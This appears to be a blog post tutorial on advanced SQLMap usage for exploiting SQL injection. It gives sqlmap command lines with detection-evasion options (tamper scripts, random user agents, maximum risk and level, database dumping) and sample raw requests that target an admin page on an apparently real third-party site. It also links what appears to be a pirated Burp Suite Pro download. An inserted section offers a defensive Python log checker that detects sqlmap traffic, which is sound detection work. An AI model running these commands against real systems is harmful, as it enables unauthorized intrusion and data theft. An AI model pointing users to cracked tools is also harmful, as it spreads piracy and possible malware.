SQLMap is a tool that automates the exploitation of SQL injection, saving time compared with manual exploitation. I already have a guide on how to use basic SQLMap, but SQLMap also has advanced parameters that save time and make exploitation more efficient. Here are some advanced SQLMap usage techniques for exploiting SQL injection flaws.
How to use advanced SQLMap
I will briefly talk about how to install and use SQLMap first:
Use --batch so that SQLMap runs automatically and skips yes/no questions
Use * to mark the injection location
Use --string="String_in_the_response" to tell SQLMap which string in the response shows that the injection succeeded (True)
sqlmap -u "https://anonyviet.com/s.php?q=test" -p "q"
sqlmap -r request.txt
sqlmap -m urls.txt
sqlmap -u "http://afine.com/user/*" -H "User-agent: *"
sqlmap -r request.txt --second-order "http://afine.com/avatar"
--random-agent
--batch
--risk=3 --level=5
--proxy=http://127.0.0.1:8080
-v 0
-v 4
--output-dir=sqlmap
--prefix "this_string_must_be_before_injection"
--suffix "--this_string_must_be_at_the_end_of_injection"
sqlmap -u "https://afine.com/s.php?q=1" -p 'q' --eval='q=q.replace(" ","%20")'
--tamper="PATH_OR_NAME_OF_TAMPER_SCRIPT"
-H "Auth_header: secret1" -H "Cookie: auth2=secret2"
python sqlmap.py -r request.txt --random-agent --tamper=space2comment --time-sec=20 --level=5 --risk=3 --dbs --batch
POST request: to inject into the username parameter, put * in username=
POST //index.php?module=user&function=login HTTP/1.1
Host: anonyviet.com

username=*&password=1
Save the file as request.txt and put it in the sqlmap folder
GET request:
GET /admin/index.php?option=tin-sua&tin_id=1
Host: phanthiet.terracottaresort.com
Save the file as request.txt and put it in the sqlmap folder
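A defender-side view of the full command above, as an added example that is not part of the original post: a small Python check that flags the traces these options leave in web-server access logs (sqlmap's default User-Agent when --random-agent is not used, the /**/ separators produced by --tamper=space2comment, and the delay functions used by time-based tests). The log lines, IP addresses, sqlmap version string and rule names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (combined format); IPs are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /s.php?q=test HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /s.php?q=1%20AND%201%3D1 HTTP/1.1" '
    '200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.20 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /s.php?q=1%2F%2A%2A%2FAND%2F%2A%2A%2FSLEEP(20) HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]

# client IP, request target, User-Agent
LOG_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" \d{3} \S+ "[^"]*" "([^"]*)"$')

# Hypothetical rule names; each rule sees the URL-decoded query string and the UA.
RULES = {
    # Default UA, present whenever --random-agent (or a custom UA) is not set.
    "default-user-agent": lambda q, ua: "sqlmap" in ua.lower(),
    # space2comment replaces spaces with /**/ between SQL tokens.
    "space2comment": lambda q, ua: re.search(r"\w/\*\*/\w", q) is not None,
    # Delay functions used by time-based blind tests.
    "time-based": lambda q, ua: re.search(
        r"(?i)\b(sleep|pg_sleep|benchmark)\s*\(|waitfor\s+delay", q) is not None,
}

def classify(line):
    """Return (client_ip, matched_rule_names) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, ua = m.groups()
    query = unquote_plus(urlsplit(target).query)  # decode %2F%2A%2A%2F etc.
    return ip, {name for name, rule in RULES.items() if rule(query, ua)}

def summarize(lines):
    """Group matched rules per client IP, skipping clean and unparsable lines."""
    hits = defaultdict(set)
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            hits[parsed[0]] |= parsed[1]
    return {ip: sorted(labels) for ip, labels in hits.items()}

if __name__ == "__main__":
    for ip, labels in summarize(SAMPLE_LOG).items():
        print(ip, ", ".join(labels))
```

The third sample line shows why a User-Agent rule alone is not enough: with a browser-like agent, only the decoded query string gives the request away.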
Use Burp Suite Pro extensions.
Download Burp Suite Pro here
- Request Timer: records how long responses take (suitable for blind SQL injection).
- Burp Bounty Pro: automatically searches for security holes with Burp Suite Pro (if you need this extension, I will send it separately in the comments below)
Any SQLi found by SQLiPy will be added to the Results tab in Burp Suite.
SQL Injection payloads
A summary of payloads for testing SQL injection is here: PayloadsAllTheThings.
Download the SQLMap cheat sheet here: https://github.com/anonyvietofficial/sqlmap-cheatsheet